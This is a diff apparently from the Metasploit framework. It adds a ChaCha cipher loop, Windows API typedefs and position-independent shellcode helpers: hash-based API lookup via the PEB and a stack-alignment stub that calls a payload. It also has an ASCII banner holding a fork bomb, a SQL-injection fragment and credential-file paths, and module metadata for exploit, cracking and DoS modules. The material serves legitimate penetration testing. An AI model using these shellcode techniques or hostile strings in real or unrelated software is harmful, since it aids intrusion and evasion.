+  j6 = x->input[6];
+  j7 = x->input[7];
+  j8 = x->input[8];
+  j9 = x->input[9];
+  j10 = x->input[10];
+  j11 = x->input[11];
+  j12 = x->input[12];
+  j13 = x->input[13];
+  j14 = x->input[14];
+  j15 = x->input[15];
+
+  for (;;) {
+    if (bytes < 64) {
+      for (i = 0;i < bytes;++i) tmp[i] = m[i];
+      m = tmp;
+      ctarget = c;
+      c = tmp;
+    }
+    x0 = j0;
+    x1 = j1;
+    x2 = j2;
+    x3 = j3;
+    x4 = j4;
+    x5 = j5;
+    x6 = j6;
+    x7 = j7;
+    x8 = j8;
+    x9 = j9;
+    x10 = j10;
+    x11 = j11;
+    x12 = j12;
+    x13 = j13;
+    x14 = j14;
+    x15 = j15;
+    for (i = 20;i > 0;i -= 2) {
+      QUARTERROUND( x0, x4, x8,x12)
+      QUARTERROUND( x1, x5, x9,x13)
+      QUARTERROUND( x2, x6,x10,x14)
+      QUARTERROUND( x3, x7,x11,x15)
+      QUARTERROUND( x0, x5,x10,x15)
+      QUARTERROUND( x1, x6,x11,x12)
+      QUARTERROUND( x2, x7, x8,x13)
+      QUARTERROUND( x3, x4, x9,x14)
+    }
+    x0 = PLUS(x0,j0);
+    x1 = PLUS(x1,j1);
+    x2 = PLUS(x2,j2);
+    x3 = PLUS(x3,j3);
+    x4 = PLUS(x4,j4);
+    x5 = PLUS(x5,j5);
+    x6 = PLUS(x6,j6);
+    x7 = PLUS(x7,j7);
+    x8 = PLUS(x8,j8);
+    x9 = PLUS(x9,j9);
+    x10 = PLUS(x10,j10);
+    x11 = PLUS(x11,j11);
+    x12 = PLUS(x12,j12);
+    x13 = PLUS(x13,j13);
+    x14 = PLUS(x14,j14);
+    x15 = PLUS(x15,j15);
+
+#ifndef KEYSTREAM_ONLY
+    x0 = XOR(x0,U8TO32_LITTLE(m + 0));
+    x1 = XOR(x1,U8TO32_LITTLE(m + 4));
+    x2 = XOR(x2,U8TO32_LITTLE(m + 8));
+    x3 = XOR(x3,U8TO32_LITTLE(m + 12));
+    x4 = XOR(x4,U8TO32_LITTLE(m + 16));
+    x5 = XOR(x5,U8TO32_LITTLE(m + 20));
+    x6 = XOR(x6,U8TO32_LITTLE(m + 24));
+    x7 = XOR(x7,U8TO32_LITTLE(m + 28));
+    x8 = XOR(x8,U8TO32_LITTLE(m + 32));
+    x9 = XOR(x9,U8TO32_LITTLE(m + 36));
+    x10 = XOR(x10,U8TO32_LITTLE(m + 40));
+    x11 = XOR(x11,U8TO32_LITTLE(m + 44));
+    x12 = XOR(x12,U8TO32_LITTLE(m + 48));
+    x13 = XOR(x13,U8TO32_LITTLE(m + 52));
+    x14 = XOR(x14,U8TO32_LITTLE(m + 56));
+    x15 = XOR(x15,U8TO32_LITTLE(m + 60));
+#endif
+
+    j12 = PLUSONE(j12);
+    if (!j12) {
+      j13 = PLUSONE(j13);
+      /* stopping at 2^70 bytes per nonce is user's responsibility */
+    }
+
+    U32TO8_LITTLE(c + 0,x0);
+    U32TO8_LITTLE(c + 4,x1);
+    U32TO8_LITTLE(c + 8,x2);
+    U32TO8_LITTLE(c + 12,x3);
+    U32TO8_LITTLE(c + 16,x4);
+    U32TO8_LITTLE(c + 20,x5);
+    U32TO8_LITTLE(c + 24,x6);
+    U32TO8_LITTLE(c + 28,x7);
+    U32TO8_LITTLE(c + 32,x8);
+    U32TO8_LITTLE(c + 36,x9);
+    U32TO8_LITTLE(c + 40,x10);
+    U32TO8_LITTLE(c + 44,x11);
+    U32TO8_LITTLE(c + 48,x12);
+    U32TO8_LITTLE(c + 52,x13);
+    U32TO8_LITTLE(c + 56,x14);
+    U32TO8_LITTLE(c + 60,x15);
+
+    if (bytes <= 64) {
+      if (bytes < 64) {
+        for (i = 0;i < bytes;++i) ctarget[i] = c[i];
+      }
+      x->input[12] = j12;
+      x->input[13] = j13;
+      return;
+    }
+    bytes -= 64;
+    c += 64;
+#ifndef KEYSTREAM_ONLY
+    m += 64;
+#endif
+  }
+}
@@ -0,0 +1,136 @@
+#ifndef _KERNEL_UTIL
+#define _KERNEL_UTIL
+
+typedef BOOL (WINAPI *FuncCreateProcess) (
+	LPCTSTR lpApplicationName,
+	LPTSTR lpCommandLine,
+	LPSECURITY_ATTRIBUTES lpProcessAttributes,
+	LPSECURITY_ATTRIBUTES lpThreadAttributes,
+	BOOL bInheritHandles,
+	DWORD dwCreationFlags,
+	LPVOID lpEnvironment,
+	LPCTSTR lpCurrentDirectory,
+	LPSTARTUPINFO lpStartupInfo,
+	LPPROCESS_INFORMATION lpProcessInformation
+);
+
+typedef BOOL (WINAPI *FuncSetHandleInformation)
+(
+  HANDLE hObject,
+  DWORD dwMask,
+  DWORD dwFlags
+);
+
+typedef BOOL (WINAPI *FuncReadFile)
+(
+  HANDLE hFile,
+  LPVOID lpBuffer,
+  DWORD nNumberOfBytesToRead,
+  LPDWORD lpNumberOfBytesToRead,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncWriteFile)
+(
+  HANDLE hFile,
+  LPCVOID lpBuffer,
+  DWORD nNumberOfBytesToWrite,
+  LPDWORD lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncPeekNamedPipe)
+(
+  HANDLE hNamedPipe,
+  LPVOID lpBuffer,
+  DWORD nBufferSize,
+  LPDWORD nBytesRead,
+  LPDWORD lpTotalBytesAvailable,
+  LPDWORD lpBytesLeftThisMessage
+);
+
+typedef BOOL (WINAPI *FuncCreatePipe)
+(
+  PHANDLE hReadPipe,
+  PHANDLE hWritePipe,
+  LPSECURITY_ATTRIBUTES lpPipeAttributes,
+  DWORD nSize
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalAlloc)
+(
+  UINT uFlags,
+  SIZE_T dwBytes
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalFree)
+(
+  HGLOBAL hMem
+);
+
+typedef HANDLE (WINAPI *FuncHeapCreate)
+(
+  DWORD flOptions,
+  SIZE_T dwInitialize,
+  SIZE_T dwMaximumSize
+);
+
+typedef LPVOID (WINAPI *FuncHeapAlloc)
+(
+  HANDLE hHeap,
+  DWORD dwFlags,
+  SIZE_T dwBytes
+);
+
+typedef VOID (WINAPI *FuncSleep)
+(
+  DWORD dwMilliseconds
+);
+
+typedef HANDLE (WINAPI *FuncGetCurrentProcess) ();
+
+typedef BOOL (WINAPI *FuncGetExitCodeProcess)
+(
+  HANDLE hProcess,
+  LPDWORD lpExitCode
+);
+
+typedef VOID (WINAPI *FuncExitProcess)
+(
+  UINT uExitCode
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef BOOL (WINAPI *FuncVirtualProtect)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flNewProtect,
+  PDWORD lpflOldProtect
+);
+
+typedef LPVOID (WINAPI *FuncVirtualAlloc)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flAllocationType,
+  DWORD flProtect
+);
+
+typedef BOOL (WINAPI *FuncVirtualFree)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD dwFreeType
+);
+
+#endif
@@ -0,0 +1,152 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+#ifndef _PAYLOAD_UTIL
+#define _PAYLOAD_UTIL
+
+#include <windows.h>
+#include <winternl.h>
+
+typedef HMODULE (WINAPI *FuncLoadLibraryA) (
+	LPTSTR lpFileName
+);
+
+// This compiles to a ROR instruction
+// This is needed because _lrotr() is an external reference
+// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
+#define ROTR32(value, shift)	(((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
+
+// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
+typedef struct _MY_PEB_LDR_DATA {
+  ULONG Length;
+	BOOL Initialized;
+	PVOID SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+  LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;
+
+typedef struct _MY_LDR_DATA_TABLE_ENTRY
+{
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
+
+HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
+{
+	PPEB PebAddress;
+	PMY_PEB_LDR_DATA pLdr;
+	PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
+	PVOID pModuleBase;
+	PIMAGE_NT_HEADERS pNTHeader;
+	DWORD dwExportDirRVA;
+	PIMAGE_EXPORT_DIRECTORY pExportDir;
+	PLIST_ENTRY pNextModule;
+	DWORD dwNumFunctions;
+	USHORT usOrdinalTableIndex;
+	PDWORD pdwFunctionNameBase;
+	PCSTR pFunctionName;
+	UNICODE_STRING BaseDllName;
+	DWORD dwModuleHash;
+	DWORD dwFunctionHash;
+	PCSTR pTempChar;
+	DWORD i;
+
+#if defined(_WIN64)
+	PebAddress = (PPEB) __readgsqword( 0x60 );
+#else
+	PebAddress = (PPEB) __readfsdword( 0x30 );
+#endif
+
+	pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
+	pNextModule = pLdr->InLoadOrderModuleList.Flink;
+	pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;
+
+	while (pDataTableEntry->DllBase != NULL)
+	{
+		dwModuleHash = 0;
+		pModuleBase = pDataTableEntry->DllBase;
+		BaseDllName = pDataTableEntry->BaseDllName;
+		pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
+		dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
+
+		// Get the next loaded module entry
+		pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;
+
+		// If the current module does not export any functions, move on to the next module.
+		if (dwExportDirRVA == 0)
+		{
+			continue;
+		}
+
+		// Calculate the module hash
+		for (i = 0; i < BaseDllName.MaximumLength; i++)
+		{
+			pTempChar = ((PCSTR) BaseDllName.Buffer + i);
+
+			dwModuleHash = ROTR32( dwModuleHash, 13 );
+
+			if ( *pTempChar >= 0x61 )
+			{
+				dwModuleHash += *pTempChar - 0x20;
+			}
+			else
+			{
+				dwModuleHash += *pTempChar;
+			}
+		}
+
+		pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);
+
+		dwNumFunctions = pExportDir->NumberOfNames;
+		pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);
+
+		for (i = 0; i < dwNumFunctions; i++)
+		{
+			dwFunctionHash = 0;
+			pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
+			pdwFunctionNameBase++;
+
+			pTempChar = pFunctionName;
+
+			do
+			{
+				dwFunctionHash = ROTR32( dwFunctionHash, 13 );
+				dwFunctionHash += *pTempChar;
+				pTempChar++;
+			} while (*(pTempChar - 1) != 0);
+
+			dwFunctionHash += dwModuleHash;
+
+			if (dwFunctionHash == dwModuleFunctionHash)
+			{
+				usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
+				return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
+			}
+		}
+	}
+
+	// All modules have been exhausted and the function was not found.
+	return NULL;
+}
+
+#endif
@@ -0,0 +1,64 @@
+#ifndef _WINSOCK_UTIL
+#define _WINSOCK_UTIL
+
+#define WIN32_LEAN_AND_MEAN
+
+#include <windows.h>
+#include <winsock2.h>
+#include <intrin.h>
+#include <ws2tcpip.h>
+
+typedef int (WINAPI *FuncWSAStartup)
+(
+  WORD wVersionRequired,
+  LPWSADATA lpWSAData
+);
+
+typedef int (WINAPI *FuncWSACleanup) ();
+
+typedef int (WINAPI *FuncGetAddrInfo)
+(
+  PCSTR pNodeName,
+  PCSTR pServiceName,
+  const ADDRINFO *pHints,
+  LPADDRINFO *ppResult
+);
+
+typedef void (WINAPI *FuncFreeAddrInfo)
+(
+  LPADDRINFO pAddrInfo
+);
+
+typedef SOCKET (WINAPI *FuncWSASocketA) (
+	int af,
+	int type,
+	int protocol,
+	LPWSAPROTOCOL_INFO lpProtocolInfo,
+	GROUP g,
+	DWORD dwFlags
+);
+
+typedef int (WINAPI *FuncConnect)
+(
+  SOCKET s,
+  const struct sockaddr *name,
+  int namelen
+);
+
+typedef int (WINAPI *FuncSend)
+(
+  SOCKET s,
+  const char *buf,
+  int len,
+  int flags
+);
+
+typedef int (WINAPI *FuncRecv)
+(
+  SOCKET s,
+  char *buf,
+  int len,
+  int flags
+);
+
+#endif
@@ -0,0 +1,33 @@
+                                              `:oDFo:`                            
+                                           ./ymM0dayMmy/.                          
+                                        -+dHJ5aGFyZGVyIQ==+-                    
+                                    `:sm⏣~~Destroy.No.Data~~s:`                
+                                 -+h2~~Maintain.No.Persistence~~h+-              
+                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
+                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
+                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
+                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
+                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
+                      :we're.all.alike'`                     The.PFYroy.No.D7:  
+                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
+                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
+                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
+                      :<script>.Ac816/                        sENbove3101.404:    
+                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
+                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
+                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
+                      :#OUTHOUSE-  -s:                       /corykennedyData:    
+                      :$nmap -oS                              SSo.6178306Ence:    
+                      :Awsm.da:                            /shMTl#beats3o.No.:    
+                      :Ring0:                             `dDestRoyREXKC3ta/M:    
+                      :23d:                               sSETEC.ASTRONOMYist:    
+                       /-                        /yo-    .ence.N:(){ :|: & };:    
+                                                 `:Shall.We.Play.A.Game?tron/    
+                                                 ```-ooy.if1ghtf0r+ehUser5`    
+                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
+                                              `MjM~~WE.ARE.se~~MMjMs              
+                                               +~KANSAS.CITY's~-`                  
+                                                J~HAKCERS~./.`                    
+                                                .esc:wq!:`                        
+                                                 +++ATH`                            
+                                                  `
@@ -0,0 +1,48 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+; Author:       Matthew Graeber (@mattifestation)
+; License:      BSD 3-Clause
+; Syntax:       MASM
+; Build Syntax: ml64 /c /Cx AdjustStack.asm
+; Output:       AdjustStack.obj
+; Notes: I really wanted to avoid having this external dependency but I couldnt
+; come up with any other way to guarantee 16-byte stack alignment in 64-bit
+; shellcode written in C.
+
+extern	ExecutePayload
+global  AlignRSP			; Marking AlignRSP as PUBLIC allows for the function
+							; to be called as an extern in our C code.
+
+segment .text
+
+; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
+; to calling the entry point of the payload. This is necessary because 64-bit functions
+; in Windows assume that they were called with 16-byte stack alignment. When amd64
+; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
+; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
+; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
+; alignment.
+
+AlignRSP:
+	push	rsi						; Preserve RSI since were stomping on it
+	mov		rsi, rsp				; Save the value of RSP so it can be restored
+	and		rsp, 0FFFFFFFFFFFFFFF0h	; Align RSP to 16 bytes
+	sub		rsp, 020h				; Allocate homing space for ExecutePayload
+	call	ExecutePayload			; Call the entry point of the payload
+	mov		rsp, rsi				; Restore the original value of RSP
+	pop		rsi						; Restore RSI
+	ret								; Return to caller
@@ -0,0 +1,9 @@
+ENTRY(_ExecutePayload)
+SECTIONS
+{
+	.text :
+	{
+		*(.text.ExecutePayload)
+	}
+
+}
@@ -0,0 +1,11 @@
+ENTRY(AlignRSP)
+SECTIONS
+{
+	.text :
+	{
+    *(.text.AlignRSP)
+		*(.text.ExecutePayload)
+		*(.text.GetProcAddressWithHash)
+	}
+
+}
@@ -220,7 +220,7 @@
    "path": "/modules/auxiliary/admin/atg/atg_client.rb",
    "is_install_path": true,
    "ref_name": "admin/atg/atg_client",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -649,7 +649,7 @@
    "path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/cisco/cisco_secure_acs_bypass",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1364,7 +1364,7 @@
    "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cnpilot_r_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1411,7 +1411,7 @@
    "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
    "is_install_path": true,
    "ref_name": "admin/http/cnpilot_r_fpt",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -1458,7 +1458,7 @@
    "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "admin/http/contentkeeper_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -3615,7 +3615,7 @@
    "path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_administration",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -3665,7 +3665,7 @@
    "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_utf8_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -3717,7 +3717,7 @@
    "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/trendmicro_dlp_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5228,7 +5228,7 @@
    "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_findandsampledata",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5318,7 +5318,7 @@
    "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_ntlm_stealer",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5567,7 +5567,7 @@
    "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb",
    "is_install_path": true,
    "ref_name": "admin/natpmp/natpmp_map",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -5656,7 +5656,7 @@
    "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/officescan/tmlisten_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6348,7 +6348,7 @@
    "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb",
    "is_install_path": true,
    "ref_name": "admin/sap/sap_mgmt_con_osexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -6828,7 +6828,7 @@
    "path": "/modules/auxiliary/admin/smb/check_dir_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/check_dir_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6867,7 +6867,7 @@
    "path": "/modules/auxiliary/admin/smb/delete_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/delete_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6906,7 +6906,7 @@
    "path": "/modules/auxiliary/admin/smb/download_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/download_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -6994,7 +6994,7 @@
    "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/ms17_010_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7043,7 +7043,7 @@
    "path": "/modules/auxiliary/admin/smb/psexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/psexec_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7164,7 +7164,7 @@
    "path": "/modules/auxiliary/admin/smb/upload_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7204,7 +7204,7 @@
    "path": "/modules/auxiliary/admin/smb/webexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/webexec_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7279,11 +7279,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-09-13 13:09:01 +0000",
+    "mod_time": "2019-11-01 19:21:47 +0000",
    "path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py",
    "is_install_path": true,
    "ref_name": "admin/teradata/teradata_odbc_sql",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -7801,7 +7801,7 @@
    "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
    "is_install_path": true,
    "ref_name": "admin/vxworks/wdbrpc_reboot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -8160,6 +8160,43 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_analyze/crack_mobile": {
+    "name": "Password Cracker: Mobile",
+    "fullname": "auxiliary/analyze/crack_mobile",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module uses Hashcat to identify weak passwords that have been\n        acquired from Android systems.  These utilize MD5 or SHA1 hashing.\n        Android (Samsung) SHA1 is format 5800 in Hashcat.  Android\n        (non-Samsung) SHA1 is format 110 in Hashcat.  Android MD5 is format 10.\n        JTR does not support Android hashes at the time of writing.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-11-17 13:44:19 +0000",
+    "path": "/modules/auxiliary/analyze/crack_mobile.rb",
+    "is_install_path": true,
+    "ref_name": "analyze/crack_mobile",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_analyze/crack_osx": {
    "name": "Password Cracker: OSX",
    "fullname": "auxiliary/analyze/crack_osx",
@@ -8647,7 +8684,7 @@
    "path": "/modules/auxiliary/bnat/bnat_scan.rb",
    "is_install_path": true,
    "ref_name": "bnat/bnat_scan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -8995,7 +9032,7 @@
    "path": "/modules/auxiliary/crawler/msfcrawler.rb",
    "is_install_path": true,
    "ref_name": "crawler/msfcrawler",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9270,7 +9307,7 @@
    "path": "/modules/auxiliary/dos/dns/bind_tkey.rb",
    "is_install_path": true,
    "ref_name": "dos/dns/bind_tkey",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9311,7 +9348,7 @@
    "path": "/modules/auxiliary/dos/dns/bind_tsig.rb",
    "is_install_path": true,
    "ref_name": "dos/dns/bind_tsig",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -9573,7 +9610,7 @@
    "path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/http/apache_range_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -10064,6 +10101,53 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_dos/http/metasploit_httphandler_dos": {
+    "name": "Metasploit HTTP(S) handler DoS",
+    "fullname": "auxiliary/dos/http/metasploit_httphandler_dos",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-09-04",
+    "type": "auxiliary",
+    "author": [
+      "Jose Garduno, Dreamlab Technologies AG",
+      "Angelo Seiler, Dreamlab Technologies AG"
+    ],
+    "description": "This module exploits the Metasploit HTTP(S) handler by sending\n        a specially crafted HTTP request that gets added as a resource handler.\n        Resources (which come from the external connections) are evaluated as RegEx\n        in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n        Tested against Metasploit 5.0.20.",
+    "references": [
+      "CVE-2019-5645"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-12-26 13:31:38 +0000",
+    "path": "/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb",
+    "is_install_path": true,
+    "ref_name": "dos/http/metasploit_httphandler_dos",
+    "check": false,
+    "post_auth": false,
